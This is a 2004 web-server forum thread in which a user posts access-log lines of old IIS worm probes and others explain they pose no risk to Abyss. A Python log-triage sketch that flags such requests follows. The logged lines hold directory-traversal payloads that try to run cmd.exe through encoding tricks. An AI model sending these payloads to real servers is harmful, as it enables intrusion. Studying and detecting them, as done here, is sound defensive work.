I been hacked?

 
Arnyek
Joined: 07 Jan 2004
Posts: 1

Posted: Wed Jan 07, 2004 4:50 am    Post subject: I been hacked?

Hello Everyone!
I just installed this nice webserver on my system to share some pictures with my friends overseas.
On the first day I found this in my log numerous times from different IP addresses:
24.101.196.* - - [06/Jan/2004:21:28:06 -0800] "GET /scripts/root.exe?/c+dir HTTP/1.0" 401 260 "" ""
24.101.196.* - - [06/Jan/2004:21:28:08 -0800] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 401 260 "" ""
24.101.196.* - - [06/Jan/2004:21:28:11 -0800] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 260 "" ""
24.101.196.* - - [06/Jan/2004:21:28:14 -0800] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 260 "" ""
24.101.196.* - - [06/Jan/2004:21:28:17 -0800] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 260 "" ""
24.101.196.* - - [06/Jan/2004:21:28:19 -0800] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 260 "" ""
24.101.196.* - - [06/Jan/2004:21:28:20 -0800] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 260 "" ""
24.101.196.* - - [06/Jan/2004:21:28:23 -0800] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 260 "" ""
24.101.196.* - - [06/Jan/2004:21:28:26 -0800] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 260 "" ""
24.101.196.* - - [06/Jan/2004:21:28:28 -0800] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 260 "" ""
24.101.196.* - - [06/Jan/2004:21:28:30 -0800] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 260 "" ""
24.101.196.* - - [06/Jan/2004:21:28:31 -0800] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 260 "" ""
24.101.196.* - - [06/Jan/2004:21:28:33 -0800] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 260 "" ""
24.101.196.* - - [06/Jan/2004:21:28:35 -0800] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 260 "" ""

Should I be worried, or is there any way I can prevent this kind of attack in the future?
Sorry if I am posting in the wrong group.
I would really appreciate it if someone could give me advice or send me a link so I can learn about it.

Thanks

Arnyek
Axis
Joined: 29 Sep 2003
Posts: 336

Posted: Wed Jan 07, 2004 5:34 am

Hi Arnyek--

No, you have not been hacked. What you are seeing is the footprints of the Code Red or sadmind/IIS virus, which is quite old and mainly geared to an old FrontPage vulnerability. You are on Abyss so you have no problems with this. It is weird there are still machines out there with this (in internet time) ancient virus!

Regards,
Axis
Anonymoose
Joined: 09 Sep 2003
Posts: 2192

Posted: Wed Jan 07, 2004 10:06 am

It's actually targeting a Microsoft IIS vulnerability; you're using Abyss, not IIS, so nothing to worry about :D

http://www.aprelium.com/forum/viewtopic.php?t=2768
http://www.aprelium.com/forum/viewtopic.php?t=2749
Axis
Joined: 29 Sep 2003
Posts: 336

Posted: Wed Jan 07, 2004 4:34 pm

Anonymoose--

I stand corrected about IIS.

Regards,
Axis
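
A log-triage sketch for the kind of requests quoted in the first post, added here as an example and not part of the original thread or of Abyss: it percent-decodes each request path until it stops changing, tags the encoding tricks and targets visible in those lines, and reports per client whether any probe was answered with a 2xx. The function names, tag names and the last sample line are assumptions made for this example.

```python
import re
from urllib.parse import unquote_to_bytes

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" (\d{3}) ')
TARGET_RE = re.compile(rb'(cmd|root)\.exe', re.I)
# First four lines are copied from the log in the first post; the last is constructed.
SAMPLE = [
    '24.101.196.* - - [06/Jan/2004:21:28:06 -0800] "GET /scripts/root.exe?/c+dir HTTP/1.0" 401 260 "" ""',
    '24.101.196.* - - [06/Jan/2004:21:28:17 -0800] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 260 "" ""',
    '24.101.196.* - - [06/Jan/2004:21:28:30 -0800] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 260 "" ""',
    '24.101.196.* - - [06/Jan/2004:21:28:33 -0800] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 260 "" ""',
    '192.0.2.10 - - [06/Jan/2004:21:30:00 -0800] "GET /pictures/beach.jpg HTTP/1.0" 200 5120 "" ""',
]

def decode_rounds(raw, limit=5):
    """Percent-decode until stable; return (final bytes, rounds that changed it)."""
    rounds = 0
    while rounds < limit:
        nxt = unquote_to_bytes(raw)
        if nxt == raw:
            break
        raw, rounds = nxt, rounds + 1
    return raw, rounds

def classify(line):
    """Tag one access-log line; returns None if the line does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, url, status = m.groups()
    final, rounds = decode_rounds(url.split('?', 1)[0].encode('utf-8'))
    tags = set()
    if rounds > 1:                            # e.g. %255c -> %5c -> backslash
        tags.add('double-encoding')
    if b'\xc0' in final or b'\xc1' in final:  # 0xC0/0xC1 never occur in valid UTF-8
        tags.add('invalid-utf8')
    if b'../' in final or b'..\\' in final:
        tags.add('traversal')
    if TARGET_RE.search(final):
        tags.add('shell-binary')
    return {'ip': ip, 'status': int(status), 'tags': tags}

def summarize(lines):
    """Group tagged requests by client; 'served' is True if any of them got a 2xx."""
    out = {}
    for rec in filter(None, map(classify, lines)):
        if rec['tags']:
            s = out.setdefault(rec['ip'], {'probes': 0, 'tags': set(), 'served': False})
            s['probes'] += 1
            s['tags'] |= rec['tags']
            s['served'] |= 200 <= rec['status'] < 300
    return out
```

Calling `summarize(SAMPLE)` yields one entry for `24.101.196.*` with four probes and `served` false, matching the 401 responses in the posted log.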
All times are GMT + 1 Hour